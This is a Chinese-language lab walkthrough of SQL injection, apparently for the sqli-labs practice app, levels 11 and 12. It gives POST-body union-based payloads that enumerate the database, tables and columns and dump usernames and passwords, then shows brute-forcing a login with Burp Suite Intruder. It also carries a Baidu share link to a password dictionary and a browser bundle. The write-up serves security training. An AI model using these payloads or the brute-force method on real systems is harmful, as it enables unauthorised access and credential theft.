密码字典,超级火狐
百度网盘链接: https://pan.baidu.com/s/1v0EEXwvf41piHvYlwDTo2Q
提取码: 7vq2
超级火狐附带各种插件,十分便利,非常好用,我推荐一波
密码字典涵盖大部分漏洞用户密码,之后BurpSuit经常用到,我也极力推荐
ok,利器在手,开始打关
第十一关
Post类型基于单引号的报错
一、首先了解一下GET与POST的区别:
1、GET请求一般用去请求获取数据,
POST一般作为发送数据到后台时使用
2、GET请求也可传参到后台,但是其参数在浏览器的地址栏的url中可见,所以隐私性安全性较 差,且参数长度也是有限制的
POST请求传递参数放在Request body中,不会在url中显示,比GET要安全
3、GET 请求保留在浏览器历史记录中
POST 请求不会保留在浏览器历史记录中
4、GET请求只能进行url编码
POST支持多种编码方式
5、GET请求比较常见的方式是通过url地址栏请求
POST最常见是通过form表单发送数据请求
二、判断注入点
本人用的超级火狐)
Postdata得到:uname=a&passwd=123&submit=Submit
尝试数字型注入无结果
(--+在这里无效)
三、判断列数
在3时报错,判断列数为2
uname=a' and 1=2 order by 3#&passwd=123&submit=Submit
四、爆库
uname=a' and 1=2 union select database(),version()#&passwd=123&submit=Submit
得到库:security
五、爆表
uname=a' and 1=2 union select group_concat(table_name) ,2 from information_schema.tables where table_schema = 'security'#&passwd=123&submit=Submit
得到表:emails,referers,uagents,users
六、爆列
uname=a' and 1=2 union select group_concat(column_name) ,2 from information_schema.columns where table_schema = 'security' and table_name = 'users'#&passwd=123&submit=Submit
七、爆users的数据
uname=a' and 1=2 union select group_concat(id,' ',username,' ',password) ,2 from users#&passwd=123&submit=Submit
第十二关(burpsuit用户名密码)
POST类型基于双引号和括号的报错
1.判断注入点
同样输入用户a,密码123,在a后面加上”出现报错
uname=a"&passwd=123&submit=Submit
加上括号及注释符
uname=a") #&passwd=123&submit=Submit
之后的操作同第十一关一样把 a'改成a") ,就不废话了,然后教大家用Burpsuit爆破账号密码
burpsuit暴力破解用户名密码
随便输入用户名a,密码123,点击submit后抓包
右键发送给测试器,点击清除,在a,123两侧添加变量符号,改为集束炸弹
在1添加弱口令用户,2添加弱口令密码
攻击结果如下
得到用户admin,密码admin,输入即可成功进入